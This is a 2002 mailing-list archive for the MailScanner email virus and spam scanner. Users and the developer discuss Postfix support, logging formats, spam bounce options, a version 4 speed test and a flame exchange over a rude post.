------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Thu Sep 12 11:25:51 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Postfix support. In-Reply-To: <20020912111851.5af6cee8.marc.perea@electronic-group.com> Message-ID: <5.1.0.14.2.20020912112455.035b8978@imap.ecs.soton.ac.uk> It is one of the things on the list. Unfortunately Nick is pretty busy at the moment having recently moved from the UK to NZ. Once he gets some more time... At 10:18 12/09/2002, you wrote: >Hi everybody, > >Julian, is there any chance of having MailScanner working with Postfix at >sight ? >I mean having it working directly, not proxied like the FAQ tip. > >Maybe in a future release ? Maybe an unnofficial patch or another branch >dedicated only to postfix (and/or another MTAs) ? > >Thanks in advance, > >Marc. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From marc.perea at ELECTRONIC-GROUP.COM Thu Sep 12 12:38:24 2002 From: marc.perea at ELECTRONIC-GROUP.COM (Marc Perea) Date: Thu Jan 12 21:15:34 2006 Subject: Postfix support. In-Reply-To: <5.1.0.14.2.20020912112455.035b8978@imap.ecs.soton.ac.uk> References: <20020912111851.5af6cee8.marc.perea@electronic-group.com> <5.1.0.14.2.20020912112455.035b8978@imap.ecs.soton.ac.uk> Message-ID: <20020912133824.53e6baff.marc.perea@electronic-group.com> On Thu, 12 Sep 2002 11:25:51 +0100 Julian Field wrote: > It is one of the things on the list. Unfortunately Nick is pretty busy > at the moment having recently moved from the UK to NZ. Once he gets some > more time... Not any aproximated date ... ? Just to know if I can wait for it. It's important for me to know it because I'm very happy with MailScanner and I don't want to move away from it. Thanks in advance, Regards, Marc. From ft at IT.SU.SE Thu Sep 12 12:38:47 2002 From: ft at IT.SU.SE (Fredrik Thulin) Date: Thu Jan 12 21:15:34 2006 Subject: Postfix support. In-Reply-To: <20020912111851.5af6cee8.marc.perea@electronic-group.com> References: <20020912111851.5af6cee8.marc.perea@electronic-group.com> Message-ID: <200209121338.47037.ft@it.su.se> On Thursday 12 September 2002 11.18, Marc Perea wrote: > Hi everybody, > > Julian, is there any chance of having MailScanner working with Postfix at > sight ? > I mean having it working directly, not proxied like the FAQ tip. > > Maybe in a future release ? Maybe an unnofficial patch or another branch > dedicated only to postfix (and/or another MTAs) ? I wrote Postfix support for MailScanner as of 2002-06-01 (or around that date). Julian considered it too many changes (I also made all message handling object oriented to avoid passing around all those hashes) and would not merge my code into MailScanner. We saw no other option than to fork the development. You can see the results at http://devel.it.su.se/cgi-bin/local/cvsweb.cgi/SU-MailScanner/ (instructions on how to access the CVS anonymously can be found at http://devel.it.su.se/cvs.html). We would like to invite anyone interested to come and help with the development, but everyone should know that this is NOT a MailScanner which you can send questions about to this mailinglist. This mailinglist is for the original MailScanner. If interest is high enough, we will set up another mailing list for discussions about SU-MailScanner. /Fredrik From henrik at LEWANDER.COM Thu Sep 12 12:42:27 2002 From: henrik at LEWANDER.COM (Henrik Lewander) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions References: <5.1.0.14.2.20020910213357.0236b898@imap.ecs.soton.ac.uk> Message-ID: <031301c25a51$7a705c30$05c6a8c0@gbg.bluelabs.se> Julian Field wrote: > I've just added a bit more to the spam handling code you can now > "bounce" messages in addition to all the other things you can do. > This will cause a (customizable) report message to be sent back to > the sender of the message, with the envelope constructed so that the > message will not bounce. Maybe you could make virus reports to senders also as "bounces" so we won't get bounces for the bounces? :) /Henrik From info at pro-invest.ca Thu Sep 12 13:40:30 2002 From: info at pro-invest.ca (Professional Investments Investor Services) Date: Thu Jan 12 21:15:34 2006 Subject: Feature, maybe misfeature In-Reply-To: <5.1.0.14.2.20020911213528.02402708@imap.ecs.soton.ac.uk> Message-ID: You wrote: The new version already does that. It will save it into a directory (where yyyymmdd is the date) ....quarantine-dir/yyyymmdd/spam so you can extract the spam for each day very easily. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ Being extremely new to Linux ... how do we do this? Thanks a ton for your software, it has been a huge help in the virus field and we are now playing with the additional Spam features combined with SA. Mark Tavares From mailscanner at ecs.soton.ac.uk Thu Sep 12 14:13:20 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Feature, maybe misfeature In-Reply-To: References: <5.1.0.14.2.20020911213528.02402708@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020912141251.02dee820@imap.ecs.soton.ac.uk> At 13:40 12/09/2002, you wrote: >You wrote: > > The new version already does that. It will save it into a directory >(where >yyyymmdd is the date) > ....quarantine-dir/yyyymmdd/spam >so you can extract the spam for each day very easily. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > > >Being extremely new to Linux ... how do we do this? You wait for me to release the new version. >Thanks a ton for your software, it has been a huge help in the virus field >and we are now playing with the additional Spam features combined with SA. Glad to hear it is going well! -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 12 14:13:42 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions In-Reply-To: <031301c25a51$7a705c30$05c6a8c0@gbg.bluelabs.se> References: <5.1.0.14.2.20020910213357.0236b898@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020912141333.04c2fb40@imap.ecs.soton.ac.uk> At 12:42 12/09/2002, you wrote: >Julian Field wrote: > > I've just added a bit more to the spam handling code you can now > > "bounce" messages in addition to all the other things you can do. > > This will cause a (customizable) report message to be sent back to > > the sender of the message, with the envelope constructed so that the > > message will not bounce. > >Maybe you could make virus reports to senders also as "bounces" so we won't >get bounces for the bounces? :) Good idea. Will do. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 12 14:12:23 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Postfix support. In-Reply-To: <200209121338.47037.ft@it.su.se> References: <20020912111851.5af6cee8.marc.perea@electronic-group.com> <20020912111851.5af6cee8.marc.perea@electronic-group.com> Message-ID: <5.1.0.14.2.20020912141144.04b62b40@imap.ecs.soton.ac.uk> MailScanner version 4 is a whole lot more OO than any previous release. Once I've got the code working pretty well, you are welcome to a copy to work on Postfix support. At 12:38 12/09/2002, you wrote: >On Thursday 12 September 2002 11.18, Marc Perea wrote: > > Hi everybody, > > > > Julian, is there any chance of having MailScanner working with Postfix at > > sight ? > > I mean having it working directly, not proxied like the FAQ tip. > > > > Maybe in a future release ? Maybe an unnofficial patch or another branch > > dedicated only to postfix (and/or another MTAs) ? > >I wrote Postfix support for MailScanner as of 2002-06-01 (or around that >date). Julian considered it too many changes (I also made all message >handling object oriented to avoid passing around all those hashes) and would >not merge my code into MailScanner. > >We saw no other option than to fork the development. You can see the results >at http://devel.it.su.se/cgi-bin/local/cvsweb.cgi/SU-MailScanner/ >(instructions on how to access the CVS anonymously can be found at >http://devel.it.su.se/cvs.html). > >We would like to invite anyone interested to come and help with the >development, but everyone should know that this is NOT a MailScanner which >you can send questions about to this mailinglist. This mailinglist is for the >original MailScanner. If interest is high enough, we will set up another >mailing list for discussions about SU-MailScanner. > >/Fredrik -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Matthew_doherty at DATAWATCH.COM Thu Sep 12 14:24:27 2002 From: Matthew_doherty at DATAWATCH.COM (David _Kearsley) Date: Thu Jan 12 21:15:34 2006 Subject: Postfix support. Message-ID: Many people gave suggestions about mailscanner logging. Which ones did you consider? And the ones you didn't, why? Thanks! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/ece648ba/attachment.html From LISTSERV at JISCMAIL.AC.UK Thu Sep 12 14:28:01 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:34 2006 Subject: MAILSCANNER: abehn@GMX.NET requested to join Message-ID: <200209121328.OAA00809@magpie.ecs.soton.ac.uk> Thu, 12 Sep 2002 14:28:01 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Andreas Behnert . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER abehn@GMX.NET Andreas Behnert The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+abehn%40GMX.NET+Andreas+Behnert&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From lbergman at abi.tconline.net Thu Sep 12 14:41:44 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions In-Reply-To: <5.1.0.14.2.20020911215915.0223ec10@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020911203108.02291810@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020911215915.0223ec10@imap.ecs.soton.ac.uk> Message-ID: <200209120841.44736.lbergman@abi.tconline.net> > Thanks for that. Good to hear I'm displacing the commercial guys :) I > wonder if it's worth setting up a "testimonials" page on the website. All > comments on it would have to be attributed, as otherwise everyone will just > think that I wrote them. What does anyone think? I could ask our webmaster > to write me a bit of PHP to automate it too. I'll testify -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From lbergman at abi.tconline.net Thu Sep 12 14:48:18 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:34 2006 Subject: Postfix support. In-Reply-To: <20020912133824.53e6baff.marc.perea@electronic-group.com> References: <20020912111851.5af6cee8.marc.perea@electronic-group.com> <5.1.0.14.2.20020912112455.035b8978@imap.ecs.soton.ac.uk> <20020912133824.53e6baff.marc.perea@electronic-group.com> Message-ID: <200209120848.18096.lbergman@abi.tconline.net> On Thursday 12 September 2002 06:38 am, Marc Perea wrote: > On Thu, 12 Sep 2002 11:25:51 +0100 > > Julian Field wrote: > > It is one of the things on the list. Unfortunately Nick is pretty busy > > at the moment having recently moved from the UK to NZ. Once he gets some > > more time... > > Not any aproximated date ... ? Just to know if I can wait for it. > > It's important for me to know it because I'm very happy with MailScanner > and I don't want to move away from it. I find that if something is important and you want someone to givew you a date, it helps to pay them to do what you want. Even free software needs a nudge (or deserves one) sometimes. When you do something for nothing you do it when you have free time. Doing something for something on the other hand, is an entirely different manner. Consider it sponsoring open source for the benefit of all. My less than 2 cents worth. -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From mailscanner at ecs.soton.ac.uk Thu Sep 12 15:02:34 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: First speed test of version 4 In-Reply-To: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> This test was done on a dual-CPU 1GHz Pentium 3 box with 512Mb RAM. It's not very fast by modern standards but was quite nice when I bought it a few years ago... Version 3 processed 20,000 messages in 415.5 minutes. This scales up to 69314 messages per day. Version 4 processes 20,000 messages in 130.3 minutes. This scales up to 221028 messages per day. So version 4 ran 3.2 times faster than version 3 on the same hardware, with the same MailScanner configuration, with the same 20,000 messages. Vrrrooooommmmmm........ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 12 14:32:45 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: logging In-Reply-To: Message-ID: <5.1.0.14.2.20020912142901.04f33838@imap.ecs.soton.ac.uk> Ok, here are all the responses: 1. From <$1> To <$2> virus <$3> Impossible to generically extract the name of the virus, so this would have to include the whole virus report. 2. something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected Such as? 3. I would definately like the virus name reported by the virus engine See (1) 4. making the logging as machine freindly as possible I will do what I can. 5. entries that could be used to create email usage reports. For each email to have To, From, Subject, Date, bytes, and names of any attachments would allow for easier creation of user reports. Is there a limit on the length of a log entry? These would be *very* long. 6. Identifiable tag When you get a chance would you consider altering the logging code for matches on filename rules to have an identifiable tag. E.g. instead of logging: "Executable file in filename.exe" and "Possible MS-Dos shortcut attack in filename.pif" Log: "Filename Rules: Executable file in filename.exe" and "Filename rules: Possible MS-Dos shortcut attack in filename.pif" Definite good idea. Any more thoughts from anyone? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/c87f1734/attachment.html From lbergman at abi.tconline.net Thu Sep 12 15:13:10 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:34 2006 Subject: logging In-Reply-To: <5.1.0.14.2.20020912142901.04f33838@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020912142901.04f33838@imap.ecs.soton.ac.uk> Message-ID: <200209120913.10399.lbergman@abi.tconline.net> > Any more thoughts from anyone? Log emails forwarded but not scanned diferently (or seperately) from emails that were scanned and cleaned. Not a huge deal but would be nice. Who knows, maybe not practicle. -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From raymond at PROLOCATION.NET Thu Sep 12 15:13:21 2002 From: raymond at PROLOCATION.NET (Raymond Dijkxhoorn) Date: Thu Jan 12 21:15:34 2006 Subject: First speed test of version 4 In-Reply-To: <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> Message-ID: Hi! > Version 3 processed 20,000 messages in 415.5 minutes. > This scales up to 69314 messages per day. > > Version 4 processes 20,000 messages in 130.3 minutes. > This scales up to 221028 messages per day. > > So version 4 ran 3.2 times faster than version 3 on the same hardware, with > the same MailScanner configuration, with the same 20,000 messages. Any public beta's available ? :)) Bye, Raymond. From Chris.Campbell at FAC.COM Thu Sep 12 15:14:55 2002 From: Chris.Campbell at FAC.COM (Chris Campbell) Date: Thu Jan 12 21:15:34 2006 Subject: First speed test of version 4 Message-ID: You are the MAN!!! btw - I think we should all set up a "Julian is the Man" Donation Fund :P ..................................... Christopher S. Campbell UNIX Admin Julian Field cc: Sent by: Subject: First speed test of version 4 MailScanner mailing list 09/12/2002 10:02 AM Please respond to MailScanner mailing list This test was done on a dual-CPU 1GHz Pentium 3 box with 512Mb RAM. It's not very fast by modern standards but was quite nice when I bought it a few years ago... Version 3 processed 20,000 messages in 415.5 minutes. This scales up to 69314 messages per day. Version 4 processes 20,000 messages in 130.3 minutes. This scales up to 221028 messages per day. So version 4 ran 3.2 times faster than version 3 on the same hardware, with the same MailScanner configuration, with the same 20,000 messages. Vrrrooooommmmmm........ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From info at blacknight-solutions.com Thu Sep 12 15:22:22 2002 From: info at blacknight-solutions.com (Blacknight Solutions) Date: Thu Jan 12 21:15:34 2006 Subject: First speed test of version 4 In-Reply-To: <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> Message-ID: <20020912142222.M16758@blacknight-solutions.com> Excellent! Was that also hooked up to Spam Assassin, or running by itself? -- Blacknight Solutions (http://www.blacknight-solutions.com) From Matthew_doherty at DATAWATCH.COM Thu Sep 12 15:26:09 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:35 2006 Subject: logging Message-ID: >2. something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected > Such as? hmmm lets think hard on this one. DUH! Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Thursday, September 12, 2002 11:05 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: logging Ok, here are all the responses: 1. From <$1> To <$2> virus <$3> Impossible to generically extract the name of the virus, so this would have to include the whole virus report. 2. something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected Such as? 3. I would definately like the virus name reported by the virus engine See (1) 4. making the logging as machine freindly as possible I will do what I can. 5. entries that could be used to create email usage reports. For each email to have To, From, Subject, Date, bytes, and names of any attachments would allow for easier creation of user reports. Is there a limit on the length of a log entry? These would be *very* long. 6. Identifiable tag When you get a chance would you consider altering the logging code for matches on filename rules to have an identifiable tag. E.g. instead of logging: "Executable file in filename.exe" and "Possible MS-Dos shortcut attack in filename.pif" Log: "Filename Rules: Executable file in filename.exe" and "Filename rules: Possible MS-Dos shortcut attack in filename.pif" Definite good idea. Any more thoughts from anyone? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/c90b201a/attachment.html From mailscanner at ecs.soton.ac.uk Thu Sep 12 15:26:10 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:35 2006 Subject: First speed test of version 4 In-Reply-To: References: <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020912152549.04f424e8@imap.ecs.soton.ac.uk> At 15:13 12/09/2002, you wrote: >Hi! > > > Version 3 processed 20,000 messages in 415.5 minutes. > > This scales up to 69314 messages per day. > > > > Version 4 processes 20,000 messages in 130.3 minutes. > > This scales up to 221028 messages per day. > > > > So version 4 ran 3.2 times faster than version 3 on the same hardware, with > > the same MailScanner configuration, with the same 20,000 messages. > >Any public beta's available ? :)) Not quite yet. I've got quite a bit of testing that I want to do on it first, before I let you guys have a play. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From sevans at FOUNDATION.SDSU.EDU Thu Sep 12 15:36:42 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:35 2006 Subject: First speed test of version 4 Message-ID: <6214C3F9233D764C9E7029396C355015331490@mail.foundation.sdsu.edu> This is worse than Christmas. Steve Evans (619) 594-0653 -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Thursday, September 12, 2002 7:26 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: First speed test of version 4 At 15:13 12/09/2002, you wrote: >Hi! > > > Version 3 processed 20,000 messages in 415.5 minutes. > > This scales up to 69314 messages per day. > > > > Version 4 processes 20,000 messages in 130.3 minutes. > > This scales up to 221028 messages per day. > > > > So version 4 ran 3.2 times faster than version 3 on the same > > hardware, with the same MailScanner configuration, with the same > > 20,000 messages. > >Any public beta's available ? :)) Not quite yet. I've got quite a bit of testing that I want to do on it first, before I let you guys have a play. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Matthew_doherty at DATAWATCH.COM Thu Sep 12 15:40:24 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:35 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it Message-ID: such as Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Monday, September 09, 2002 4:34 PM To: MailScanner mailing list Subject: RE: New release logging suggestions I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/c8b25b17/attachment.html From sevans at FOUNDATION.SDSU.EDU Thu Sep 12 15:49:46 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:35 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it Message-ID: <6214C3F9233D764C9E7029396C355015116B17@mail.foundation.sdsu.edu> Normally I leave arrogant posts like this alone, because I find it's a waste of time to teach people manners in a forum like this. But . . . If you want someone to complain to, yell at, rip apart, be rude to, etc I've included a list of commercial anti-virus companies that will gladly put up with that for a few thousand+ dollars. http://www.nai.com/ http://www.trendmicro.com/ http://www.sophos.com/ Meanwhile if you plan on staying on this list, most of us don't like to see Julian assaulted with attitudes like this. He's saving me in the neighborhood of $20,000, and that's not even counting the reduced labor I have to spend on his product compared to the big boy's products, and I come from a small shop. I can't imagine what he's saving other people in money. And here's the kicker, he works for FREE. Steve Evans (619) 594-0653 -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: Thursday, September 12, 2002 7:40 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it such as Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Monday, September 09, 2002 4:34 PM To: MailScanner mailing list Subject: RE: New release logging suggestions I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/9ba89907/attachment.html From chicks at CHICKS.NET Thu Sep 12 15:51:12 2002 From: chicks at CHICKS.NET (Christopher Hicks) Date: Thu Jan 12 21:15:35 2006 Subject: First speed test of version 4 In-Reply-To: <6214C3F9233D764C9E7029396C355015331490@mail.foundation.sdsu.edu> Message-ID: On Thu, 12 Sep 2002, Steve Evans wrote: > Earlier, Julian Field said: > > Not quite yet. I've got quite a bit of testing that I want to do on > > it first, before I let you guys have a play. > > This is worse than Christmas. At least with Christmas we know when the suspense will end! :) But while I sit on my hands, the performance sounds phenomenal. I've been fighting the battle of getting my decrepit hardware to withstand mailscanner for many months now. I look forward to the relief. Someone else asked something sorta this, but I haven't seen an answer yet.... what features were enabled in the comparison? spamassassin? rbl? What if you ran the new one before the old one? Could the DNS caching make the results mis-leading? -- Camels may be nasty beasts, but they're the only way to get through the desert. From jon at XNEXT.COM Thu Sep 12 15:55:52 2002 From: jon at XNEXT.COM (Jonothon Ortiz (Xnext, Inc)) Date: Thu Jan 12 21:15:35 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it In-Reply-To: <6214C3F9233D764C9E7029396C355015116B17@mail.foundation.sdsu.edu> Message-ID: MessageI think most of us have Mr. Doherty set to a default of "ignore" ^_^ -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Steve Evans Sent: Thursday, September 12, 2002 10:50 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a week ago. try reading it Normally I leave arrogant posts like this alone, because I find it's a waste of time to teach people manners in a forum like this. But . . . If you want someone to complain to, yell at, rip apart, be rude to, etc I've included a list of commercial anti-virus companies that will gladly put up with that for a few thousand+ dollars. http://www.nai.com/ http://www.trendmicro.com/ http://www.sophos.com/ Meanwhile if you plan on staying on this list, most of us don't like to see Julian assaulted with attitudes like this. He's saving me in the neighborhood of $20,000, and that's not even counting the reduced labor I have to spend on his product compared to the big boy's products, and I come from a small shop. I can't imagine what he's saving other people in money. And here's the kicker, he works for FREE. Steve Evans (619) 594-0653 -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: Thursday, September 12, 2002 7:40 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it such as Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] Sent: Monday, September 09, 2002 4:34 PM To: MailScanner mailing list Subject: RE: New release logging suggestions I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/aa49ee06/attachment.html From abehn at GMX.NET Thu Sep 12 15:46:53 2002 From: abehn at GMX.NET (Andreas Behnert) Date: Thu Jan 12 21:15:35 2006 Subject: F-Prot dumping on console Message-ID: <3D80A8DD.1080202@gmx.net> (Sorry 'bout my poor English :) System: Linux Debian Woody 3.0r0 Mailscanner 3.22.12 F-Prot 3.12a Exim 3.35 Everything is working fine except that the whole output of F-Prot get's dumped to console #1, but only if F-Prot finds a virus. If the scanned mails are found to be clean nothing is printed on console #1. Hmm. Is there a way to get rid of this output? This makes console #1 unuseable ... Regards, Andreas From mailscanner at ecs.soton.ac.uk Thu Sep 12 16:00:50 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:35 2006 Subject: First speed test of version 4 In-Reply-To: <20020912142222.M16758@blacknight-solutions.com> References: <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> Message-ID: 